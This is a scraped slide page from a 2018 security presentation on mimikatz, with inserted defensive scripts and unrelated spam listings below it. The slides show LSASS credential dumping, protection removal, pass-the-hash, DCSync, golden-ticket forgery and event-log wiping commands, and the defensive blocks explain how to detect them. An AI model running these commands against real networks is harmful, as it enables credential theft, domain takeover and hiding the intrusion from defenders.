Sydney
Level 8, 59 Goulburn Street
Sydney NSW 2000
Melbourne
Level 15, 401 Docklands Drive
Docklands VIC 3008
Tel. 1300 922 923
Intl. +61 2 9290 4444
www.senseofsecurity.com.au
Sense of Security Pty Ltd
ABN 14 098 237 908
@ITSecurityAU
Compliance, Protection & Business Confidence
31 August 18
mimikatz
A little tool to play with Windows security
Prashant Mahajan
https://www.redbubble.com/people/gentilkiwi/portfolio
Answer to the
Ultimate Question of Life,
the Universe,
and Everything
Mimikatz is
Coffee :)
Minesweeper :)
https://twitter.com/M_haggis/status/1032798552517423105
mimikatz
https://github.com/gentilkiwi/mimikatz
Authors
• Benjamin DELPY, you can contact him on Twitter (@gentilkiwi) or by mail (benjamin [at] gentilkiwi.com) or visit his blog (http://blog.gentilkiwi.com/)
• Vincent LE TOUX, a few contributions to mimikatz including the DCSync function in the lsadump module; you can contact him on Twitter (@mysmartlogon) or by mail (vincent.letoux [at] gmail.com) or visit his website (http://www.mysmartlogon.com)
Agenda
• sekurlsa::logonpasswords
• Just scratching the surface on the capabilities
• SekurLSA module
• Event module
• DCSync
• Golden Ticket
• Silver Ticket
• Skeleton Key
• SIDHistory
• DCShadow
Credentials in Memory?!
https://adsecurity.org/?page_id=1821
• After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory.
• This is meant to facilitate Single Sign-On (SSO), ensuring a user isn’t prompted each time resource access is requested.
• The credential data may include Kerberos tickets, NTLM password hashes, LM password hashes (if the password is <15 characters, depending on Windows OS version and patch level), and even clear-text passwords to support WDigest and SSP authentication among others.
Credential Data Chart
Benjamin Delpy posted an Excel chart on OneDrive (no longer available)
http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png
sekurlsa::logonpasswords
Malicious
https://twitter.com/gentilkiwi/status/937384097642635264
https://www.virustotal.com/#/file/e46ba4bdd4168a399ee5bc2161a8c918095fa30eb20ac88cac6ab1d6dbea2b4a/detection
EXE / PS1 / DLL
https://twitter.com/gentilkiwi/status/887823565046910977
https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/
ProcDump or Task Manager
https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
No Debug Privs ? !
No Debug Privs ? !
https://twitter.com/gentilkiwi/status/1032161555964723200
https://twitter.com/gentilkiwi/status/1032270189444911104
RunAsPPL
https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/credentials-protection-and-management
The Local Security Authority (LSA), which resides within the Local Security Authority Security Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages. This protected process setting for LSA can be configured in Windows 8.1 but is on by default in Windows RT 8.1 and cannot be changed.
RunAsPPL
privilege::debug
!processprotect /process:lsass.exe /remove
sekurlsa::logonpasswords
:)
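The two RunAsPPL slides above make a defender's point worth checking at scale: LSA protection is only a layer (the slide shows a signed kernel driver removing it), and it only helps if it is actually enabled, alongside disabling WDigest clear-text caching. The following is an added example, not code from the slides or from mimikatz, that parses the plain output of `reg query` for the Lsa and WDigest keys and reports whether each host is in a safe state. The sample `reg query` output is constructed; the registry value names (RunAsPPL, UseLogonCredential) and key paths are the real Windows ones. The `has_kb2871997` flag is an assumption the caller supplies: on Windows 8.1 / Server 2012 R2 and later (or older systems with KB2871997), an absent UseLogonCredential value means clear-text caching is off, while on an unpatched older host an absent value means it is on.

```python
"""Assess LSASS credential-protection settings from `reg query` output.

Added example (not from the slides): parses the text printed by
  reg query HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa
  reg query HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest
and reports whether RunAsPPL and WDigest caching are in a safe state.
"""
import re

LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
WDIGEST_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest"

# One value line as printed by reg query: "    Name    REG_DWORD    0x1"
VALUE_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*?)\s*$")


def parse_reg_query(text):
    """Return {key_path: {value_name: raw_value_string}} from reg query output."""
    keys = {}
    current = None
    for line in text.splitlines():
        if line.startswith("HKEY_"):
            current = line.strip()
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            name, _type, data = m.groups()
            keys[current][name] = data
    return keys


def dword(keys, key, name):
    """Fetch a REG_DWORD as int, or None when the value is absent."""
    raw = keys.get(key, {}).get(name)
    return int(raw, 16) if raw is not None else None


def lsa_findings(text, has_kb2871997=True):
    """Return a list of (setting, status, advice) tuples for one host.

    has_kb2871997 (assumption supplied by the caller): True for Windows 8.1 /
    2012 R2 or newer, or an older host with KB2871997; it decides what an
    absent WDigest\\UseLogonCredential value means.
    """
    keys = parse_reg_query(text)
    findings = []

    ppl = dword(keys, LSA_KEY, "RunAsPPL")
    if ppl in (1, 2):
        findings.append(("RunAsPPL", "ok", "LSASS runs as a protected process"))
    else:
        findings.append(("RunAsPPL", "weak", "set RunAsPPL=1 and reboot"))

    ulc = dword(keys, WDIGEST_KEY, "UseLogonCredential")
    if ulc == 1:
        findings.append(("WDigest", "weak", "UseLogonCredential=1 keeps clear-text passwords in LSASS; set it to 0"))
    elif ulc == 0:
        findings.append(("WDigest", "ok", "clear-text WDigest caching disabled"))
    elif has_kb2871997:
        findings.append(("WDigest", "ok", "value absent: defaults to disabled at this OS/patch level"))
    else:
        findings.append(("WDigest", "weak", "value absent on a pre-KB2871997 host: clear-text caching is on; patch and set UseLogonCredential=0"))
    return findings


def status_map(text, **kw):
    """Convenience: {setting: status} for quick fleet-wide comparison."""
    return {setting: status for setting, status, _ in lsa_findings(text, **kw)}


# Constructed sample output of the two reg query commands on a weak host.
SAMPLE_WEAK = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Bounds    REG_BINARY    0030000000200000
    LimitBlankPasswordUse    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    Debuglevel    REG_DWORD    0x0
    UseLogonCredential    REG_DWORD    0x1
"""

# Constructed sample output on a hardened host.
SAMPLE_HARDENED = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    RunAsPPL    REG_DWORD    0x1
    LimitBlankPasswordUse    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    UseLogonCredential    REG_DWORD    0x0
"""

# Constructed sample where neither value has ever been set.
SAMPLE_DEFAULTS = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    LimitBlankPasswordUse    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
    Debuglevel    REG_DWORD    0x0
"""

if __name__ == "__main__":
    for label, sample in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        print(label, lsa_findings(sample))
```

Feed it the captured `reg query` output from each host (for example collected by your configuration-management tooling) and compare the `status_map` results across the fleet. Because the slide's `!processprotect /remove` relies on loading a kernel driver, treat a passing RunAsPPL check as necessary but not sufficient, and pair it with controls over which drivers may load and with monitoring of new driver service installations.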
SekurLSA module
Pass the Hash
sekurlsa::pth /user:da /domain:sos.labs /ntlm:eaabfdbde55b39c1a9b8d6786afd251e /run:powershell.exe
Event module
privilege::debug
Get Debug Privs :)
event::drop
Patch the Events service so that no new events are written.
event::clear
Clear the event log without any log-cleared event (1102) being logged.
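Both commands in the Event module attack the audit trail itself: event::drop stops new events, event::clear wipes the log without the 1102 record that a normal clear produces. Neither can be caught by looking for a specific event, so the defender's angle is to watch the stream from each host at the collector. The following is an added example (not from the slides) that applies two such heuristics to forwarded Security-log records: a host whose log goes quiet for far longer than its own usual inter-event interval, and a host whose EventRecordID sequence jumps backwards without the first post-reset record being a 1102. The records are constructed; the second heuristic rests on the assumption, stated in the code, that a cleared Security log restarts its record numbering.

```python
"""Heuristics for tampered Security logs at the collector (added example)."""
from datetime import datetime, timedelta
from statistics import median


def _gen(host, start_id, start, count, eid=4624):
    """Build `count` constructed records one minute apart."""
    base = datetime.fromisoformat(start)
    return [(host, start_id + i, eid, (base + timedelta(minutes=i)).isoformat())
            for i in range(count)]


# Constructed forwarded records: (host, EventRecordID, EventID, UTC timestamp)
SAMPLE_EVENTS = (
    _gen("dc1", 50010, "2018-08-31T01:00:00", 11)       # goes silent after 01:10
    + _gen("dc2", 70000, "2018-08-31T01:00:00", 56)     # healthy, last record 01:55
    + [("dc3", 900, 4624, "2018-08-31T01:52:00"),
       ("dc3", 901, 4672, "2018-08-31T01:53:00"),
       ("dc3", 1, 4624, "2018-08-31T01:54:00"),        # IDs restarted, no 1102
       ("dc3", 2, 4624, "2018-08-31T01:55:00"),
       ("dc4", 700, 4624, "2018-08-31T01:53:00"),
       ("dc4", 1, 1102, "2018-08-31T01:54:00"),        # audited clear: 1102 is first
       ("dc4", 2, 4624, "2018-08-31T01:55:00")]
)
NOW = datetime.fromisoformat("2018-08-31T02:00:00")


def silent_hosts(events, now, min_gap=timedelta(minutes=15), factor=5):
    """Hosts whose last record is older than max(min_gap, factor * median gap).

    Returns {host: silence_duration}. The per-host median spacing is the
    baseline, so a chatty DC is flagged sooner than a quiet member server.
    """
    by_host = {}
    for host, _rid, _eid, ts in events:
        by_host.setdefault(host, []).append(datetime.fromisoformat(ts))
    alerts = {}
    for host, times in by_host.items():
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        baseline = median(gaps) if gaps else min_gap
        threshold = max(min_gap, baseline * factor)
        silence = now - times[-1]
        if silence > threshold:
            alerts[host] = silence
    return alerts


def record_id_resets(events):
    """(host, previous_id, new_id) for backwards record-ID jumps not led by a 1102.

    Assumption: clearing the Security log recreates it and restarts
    EventRecordID, so after an audited clear the first low-numbered record is
    the 1102 itself; a restart whose first record is anything else suggests a
    clear that left no 1102 behind.
    """
    last = {}
    findings = []
    for host, rid, eid, _ts in sorted(events, key=lambda e: e[3]):
        prev = last.get(host)
        if prev is not None and rid < prev and eid != 1102:
            findings.append((host, prev, rid))
        last[host] = rid
    return findings


if __name__ == "__main__":
    print("silent:", silent_hosts(SAMPLE_EVENTS, NOW))
    print("resets:", record_id_resets(SAMPLE_EVENTS))
```

Run these periodically over the last hour or so of forwarded events; silence alone is ambiguous (a host may simply be down), so pair the silence alert with an independent liveness check before escalating.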
LSADump module
SAM
Cache
DCSync
lsadump::dcsync /domain:sos.labs /all /csv
kerberos module
Golden Ticket
https://adsecurity.org/?page_id=1821
https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf
• A Golden Ticket (GT) is a TGT using the KRBTGT NTLM password hash to encrypt and sign.
• A GT can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain.
• Since the GT is an authentication ticket, its scope is the entire domain (and the AD forest by leveraging SID History), since the TGT is used to get service tickets (TGS) used to access resources.
• The GT contains user group membership information (PAC) and is signed and encrypted using the domain’s Kerberos service account (KRBTGT), which can only be opened and read by the KRBTGT account.
Golden Ticket
https://adsecurity.org/?page_id=1821
To summarize, once an attacker gets access to the KRBTGT password hash or key (NTLM/RC4, AES128 or AES256), they can create Golden Tickets (TGTs) that can provide access to anything in AD at any time.
Mimikatz adds the following groups to the ticket by default:
• Domain Users SID: S-1-5-21-<DOMAINID>-513
• Domain Admins SID: S-1-5-21-<DOMAINID>-512
• Schema Admins SID: S-1-5-21-<DOMAINID>-518
• Enterprise Admins SID: S-1-5-21-<DOMAINID>-519 (this is only effective when the forged ticket is created in the forest root domain; otherwise the SID has to be added with the /sids parameter to obtain AD forest admin rights)
• Group Policy Creator Owners SID: S-1-5-21-<DOMAINID>-520
Golden Ticket
kerberos::golden /user:doesnotexist /domain:sos.labs /id:9999 /sid:S-1-5-21-2872888145-3513486857-3924934394 /krbtgt:99d196d2968eb268cb69529153a48623 /ptt
• /user – account to be impersonated, or any username
• /id – RID of the account to be impersonated. This could be a real account ID, such as the default administrator ID of 500, or a fake ID.
• /groups – list of groups to which the account in the ticket will belong
• /sids – SIDs to insert into the SIDHistory attribute of the account in the ticket
• /ptt – Pass the Ticket: load the golden ticket into the current session
Silver Ticket
https://adsecurity.org/?page_id=1821
A Silver Ticket is a TGS (similar to a TGT in format) using the NTLM password hash of the AD computer/service account (which can be identified by its SPN) to encrypt and sign.
Mimikatz adds the following groups to the ticket by default:
• Domain Users SID: S-1-5-21-<DOMAINID>-513
• Domain Admins SID: S-1-5-21-<DOMAINID>-512
• Schema Admins SID: S-1-5-21-<DOMAINID>-518
• Enterprise Admins SID: S-1-5-21-<DOMAINID>-519 (this is only effective when the forged ticket is created in the forest root domain; otherwise the SID has to be added with the /sids parameter to obtain AD forest admin rights)
• Group Policy Creator Owners SID: S-1-5-21-<DOMAINID>-520
Silver Ticket
kerberos::golden /user:user1 /domain:sos.labs /id:1108 /sid:S-1-5-21-2872888145-3513486857-3924934394 /target:dc1.sos.labs /rc4:fbdcd5041c96ddbd82224270b57f11fc /service:http /ptt
• /target – the host (SPN value); the sos.labs domain has dc1.sos.labs
• /service – the name of the service that we will create tickets for (must be a service running as the service account)
• /user – the user that the ticket will be created for; this can be any user account whatsoever, even user accounts that do not exist
• /groups – list of groups to which the account in the ticket will belong. Domain Admins is included by default
• /rc4 – NTLM hash of the account, or /aes128 /aes256 keys
Misc module
DisableCMD
Clip
Skeleton Key
• Inject the Skeleton Key into the LSASS process on a Domain Controller.
• This enables all user authentication to the Skeleton Key patched DC to use a “master password” (“mimikatz”, aka the Skeleton Key) as well as their usual password.
• A reboot removes the Skeleton Key injection.
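The Golden Ticket, Silver Ticket and Skeleton Key slides above share a set of artefacts a defender can look for in the domain controllers' and servers' Security logs: a ticket or logon for an account name the directory does not contain (the /user:doesnotexist case), a logon whose SID carries a RID that does not belong to that name (the /id:9999 case), a service-ticket request (4769) for which this KDC never issued a TGT (4768), a Kerberos logon (4624) on a server for which no service ticket was ever requested (a silver ticket never touches the KDC), and RC4-HMAC (etype 0x17) tickets for accounts that have AES keys, which is how an RC4-keyed forged ticket or a Skeleton Key downgrade shows up. The following is an added example, not code from the slides or from mimikatz, that runs those checks over constructed 4768/4769/4624 records against a constructed directory snapshot; the domain SID is the lab SID from the slides, the field names are the real event fields. It assumes you feed it events from all DCs in the domain (a TGT may legitimately have been issued by a different DC) and a reasonably fresh directory export.

```python
"""Forged-ticket indicators over Kerberos and logon events (added example)."""

DOMAIN_SID = "S-1-5-21-2872888145-3513486857-3924934394"  # lab domain SID from the slides
RC4_HMAC = 0x17  # TicketEncryptionType value for RC4-HMAC

# Constructed directory snapshot: account name -> (RID, account has AES keys)
DIRECTORY = {
    "administrator": (500, True),
    "user1": (1108, True),
    "user2": (1109, True),
    "svc_legacy": (1201, False),  # legacy account still limited to RC4, so 0x17 is expected
}


def account_name(raw):
    """Normalise 'user1@SOS.LABS', 'SOS\\user1' or 'user1' to 'user1'."""
    return raw.split("@")[0].split("\\")[-1].lower()


def forged_ticket_indicators(events, directory=DIRECTORY, domain_sid=DOMAIN_SID):
    """Return a sorted list of (rule, account) pairs for one correlation window."""
    tgt_issued = set()  # accounts that got a TGT (4768) from the KDCs in the window
    tgs_issued = set()  # accounts that got a service ticket (4769) in the window
    for e in events:
        if e.get("Status", "0x0") != "0x0":
            continue  # failed requests do not issue a ticket
        if e["EventID"] == 4768:
            tgt_issued.add(account_name(e["TargetUserName"]))
        elif e["EventID"] == 4769:
            tgs_issued.add(account_name(e["TargetUserName"]))

    hits = set()
    for e in events:
        eid = e["EventID"]
        if eid not in (4768, 4769, 4624):
            continue
        name = account_name(e["TargetUserName"])
        known = directory.get(name)
        if known is None:
            hits.add(("unknown-account", name))
        # RC4 ticket for an account that holds AES keys: downgrade or RC4-keyed forgery
        if eid in (4768, 4769) and known is not None and known[1] \
                and int(e["TicketEncryptionType"], 16) == RC4_HMAC:
            hits.add(("rc4-for-aes-account", name))
        # Service ticket requested with a TGT this KDC set never issued
        if eid == 4769 and name not in tgt_issued:
            hits.add(("tgs-without-tgt", name))
        if eid == 4624:
            if known is not None and e["TargetUserSid"] != f"{domain_sid}-{known[0]}":
                hits.add(("rid-mismatch", name))
            # Kerberos logon on a server without any 4769 at the DCs: silver-ticket shape
            if e.get("AuthenticationPackageName") == "Kerberos" and name not in tgs_issued:
                hits.add(("kerberos-logon-without-tgs", name))
    return sorted(hits)


# Constructed records; only the fields the checks use are included.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "user1", "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5"},
    {"EventID": 4769, "TargetUserName": "user1@SOS.LABS", "ServiceName": "cifs/dc1.sos.labs",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "TargetUserName": "user1", "TargetUserSid": DOMAIN_SID + "-1108",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos"},
    {"EventID": 4768, "TargetUserName": "svc_legacy", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.7"},
    # no 4768 precedes this TGS request, the name is not in the directory, the etype is RC4
    {"EventID": 4769, "TargetUserName": "doesnotexist@SOS.LABS", "ServiceName": "ldap/dc1.sos.labs",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.9"},
    # a real name paired with a RID the directory does not map to it
    {"EventID": 4624, "TargetUserName": "administrator", "TargetUserSid": DOMAIN_SID + "-9999",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos"},
    # valid name and SID, but no service ticket was ever requested at a DC
    {"EventID": 4624, "TargetUserName": "user2", "TargetUserSid": DOMAIN_SID + "-1109",
     "LogonType": "3", "AuthenticationPackageName": "Kerberos"},
    {"EventID": 4768, "TargetUserName": "administrator", "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.9"},
]

if __name__ == "__main__":
    for rule, account in forged_ticket_indicators(SAMPLE_EVENTS):
        print(f"{rule:30} {account}")
```

The checks are deliberately coarse: the "tgs-without-tgt" and "kerberos-logon-without-tgs" rules need a window long enough to cover ticket lifetimes and all DCs' logs, otherwise a TGT issued before the window or by an uncollected DC produces false positives; treat each rule as a lead to be corroborated rather than a verdict.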
Security Identifiers (SID) module
SIDHistory
DCShadow
Start the mimidrv service
Elevate to SYSTEM
Running as SYSTEM
Running as Domain Admin
What can you do?
• Add user to privileged groups such as Domain Admins, Enterprise Admins
• Add SIDHistory
• Change PrimaryGroupID
• etc.
DCShadow
https://github.com/samratashok/nishang/blob/master/ActiveDirectory/Set-DCShadowPermissions.ps1
The following permissions on AD objects are required:
Domain object
• DS-Install-Replica (Add/Remove Replica in Domain)
• DS-Replication-Manage-Topology (Manage Replication Topology)
• DS-Replication-Synchronize (Replication Synchronization)
Sites object in the Configuration container
• CreateChild and DeleteChild
Computer object of the attacker's machine (which is registered as a fake DC)
• WriteProperty
Target object (user, computer or ADSPath)
• WriteProperty
Privilege module
Crypto Module
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # crypto::cng
"KeyIso" service patched
mimikatz # crypto::capi
Local CryptoAPI patched
mimikatz # crypto::certificates /export
* System Store : 'CURRENT_USER' (0x00010000)
* Store : 'My'
mimikatz # crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
mimikatz # crypto::keys /export
net module
Process module
RPC module
Service module
System Environment Value module
Token manipulation module
Terminal Server module
IIS XML Config module
Data Protection API module
Security, it’s all we do. Knowledge, Experience & Trust.
Questions?
Thank You!
© 2002 – 2018 Sense of Security Pty Limited. All rights reserved.
Some images used under license from Shutterstock.com or with permission from respective trademark owners. No part of
this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying,
recording, or other electronic or mechanical methods, without the prior written permission of the publisher.
Navigating the Deluge_ Dubai Floods and the Resilience of Dubai International...
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
Apidays New York 2024 - Passkeys: Developing APIs to enable passwordless auth...
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
Apidays New York 2024 - APIs in 2030: The Risk of Technological Sleepwalk by ...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 

Mimikatz

  • 10. Credential Data Chart
    Benjamin Delpy posted an Excel chart on OneDrive (no longer available)
    http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png
  • 13. EXE / PS1 / DLL
    https://twitter.com/gentilkiwi/status/887823565046910977
    https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz/
  • 14. ProcDump or Task Manager
    procdump.exe -accepteula -ma lsass.exe lsass.dmp
    sekurlsa::minidump lsass.dmp
    sekurlsa::logonpasswords
    https://docs.microsoft.com/en-us/sysinternals/downloads/procdump
  • 15. No Debug Privs ? !
  • 16. No Debug Privs ? !
    https://twitter.com/gentilkiwi/status/1032161555964723200
    https://twitter.com/gentilkiwi/status/1032270189444911104
  • 17. RunAsPPL
    The Local Security Authority (LSA), which resides within the Local Security Authority Security Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages. This protected process setting for LSA can be configured in Windows 8.1 but is on by default in Windows RT 8.1 and cannot be changed.
    https://docs.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/credentials-protection-and-management
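As an added example (not part of the slides), a PowerShell check for the RunAsPPL setting the slide refers to, together with the audit-only mode a practitioner would turn on first so that LSA plugins that would fail the protected-process signing requirement are reported rather than blocked. The function names are mine; the registry key and the RunAsPPL and AuditLevel value names are Microsoft's.

```powershell
# Added example, not from the presentation. Run in an elevated session.
# RunAsPPL takes effect after a reboot; it is supported on Windows 8.1 and later.
$LsaKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Get-LsaProtectionState {
    # Returns the current LSA protection configuration of this host.
    $props = Get-ItemProperty -Path $LsaKey
    [pscustomobject]@{
        RunAsPPL   = [int]$props.RunAsPPL    # 1 = LSASS runs as a protected process (PPL)
        AuditLevel = [int]$props.AuditLevel  # 8 = audit-only mode, nothing is blocked yet
    }
}

function Enable-LsaProtection {
    param([switch]$AuditOnly)
    if ($AuditOnly) {
        # Audit mode: events 3065/3066 in Microsoft-Windows-CodeIntegrity/Operational
        # name the LSA plugins or drivers that would not load once RunAsPPL is enforced.
        Set-ItemProperty -Path $LsaKey -Name AuditLevel -Value 8 -Type DWord
    } else {
        # Enforce: LSASS becomes a protected process; unsigned code can no longer inject
        # into it, and a plain local administrator can no longer open it for reading.
        Set-ItemProperty -Path $LsaKey -Name RunAsPPL -Value 1 -Type DWord
    }
}

$state = Get-LsaProtectionState
if ($state.RunAsPPL -ne 1) {
    # Stage the change: audit first, enforce once the CodeIntegrity log stays clean.
    if ($state.AuditLevel -ne 8) { Enable-LsaProtection -AuditOnly }
    else { Enable-LsaProtection }
}
Get-LsaProtectionState
```

Enforcing RunAsPPL does not stop a kernel driver (such as the mimidrv service mentioned later in the deck) from removing the protection, so it belongs alongside driver allow-listing and Secure Boot rather than in place of them.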
  • 20. Pass the Hash
    sekurlsa::pth /user:da /domain:sos.labs /ntlm:eaabfdbde55b39c1a9b8d6786afd251e /run:powershell.exe
  • 21. Event module
    privilege::debug - get debug privileges
    event::drop - patch the Events service to avoid new events
    event::clear - clear the event log without any log-cleared event (1102) being logged
  • 25. DCSync
    lsadump::dcsync /domain:sos.labs /all /csv
  • 28. Golden Ticket
    • A Golden Ticket (GT) is a TGT using the KRBTGT NTLM password hash to encrypt and sign.
    • A GT can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain.
    • Since the GT is an authentication ticket, its scope is the entire domain (and the AD forest by leveraging SID History), since the TGT is used to get service tickets (TGS) used to access resources.
    • The GT contains user group membership information (PAC) and is signed and encrypted using the domain's Kerberos service account (KRBTGT), which can only be opened and read by the KRBTGT account.
    https://adsecurity.org/?page_id=1821
  • 29. Golden Ticket
    To summarize, once an attacker gets access to the KRBTGT password NTLM/RC4/AES128/AES256, they can create Golden Tickets (TGT) that can provide access to anything in AD at any time. Mimikatz adds the following groups to the ticket by default:
    • Domain Users SID: S-1-5-21<DOMAINID>-513
    • Domain Admins SID: S-1-5-21<DOMAINID>-512
    • Schema Admins SID: S-1-5-21<DOMAINID>-518
    • Enterprise Admins SID: S-1-5-21<DOMAINID>-519 (only effective when the forged ticket is created in the forest root domain; otherwise add it using the /sids parameter for AD forest admin rights)
    • Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520
    https://adsecurity.org/?page_id=1821
  • 30. Golden Ticket
    kerberos::golden /user:doesnotexist /domain:sos.labs /id:9999 /sid:S-1-5-21-2872888145-3513486857-3924934394 /krbtgt:99d196d2968eb268cb69529153a48623 /ptt
    • /user - account to be impersonated, or any username
    • /id - RID of the account to be impersonated. This could be a real account ID, such as the default administrator ID of 500, or a fake ID.
    • /groups - list of groups to which the account in the ticket will belong
    • /sids - SIDs to insert into the SIDHistory attribute of the account in the ticket
    • /ptt - Pass the Ticket: load the golden ticket into the current session
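The slide's example forges a ticket for a user (doesnotexist, RID 9999) that the directory has never heard of, and that identity is what the DC and member servers write into their 4624/4672 logon events. As an added example, not from the presentation, the following PowerShell checks the identities in Kerberos logon events against the directory and flags names or SIDs that do not resolve. The functions and the sample events are constructed here; the domain SID is the one used on the slides.

```powershell
# Added example, not from the presentation.
$DomainSid = 'S-1-5-21-2872888145-3513486857-3924934394'  # sos.labs, from the slides

# Constructed stand-in for the directory: RID -> sAMAccountName. In production replace
# Resolve-DomainAccount's body with Get-ADUser -Identity $Sid -ErrorAction SilentlyContinue.
$KnownAccounts = @{ 500 = 'Administrator'; 1108 = 'user1' }

function Resolve-DomainAccount {
    param([string]$Sid)
    if ($Sid -notlike "$DomainSid-*") { return $null }          # foreign or malformed SID
    $rid = [int]$Sid.Substring($DomainSid.Length + 1)
    return $KnownAccounts[$rid]
}

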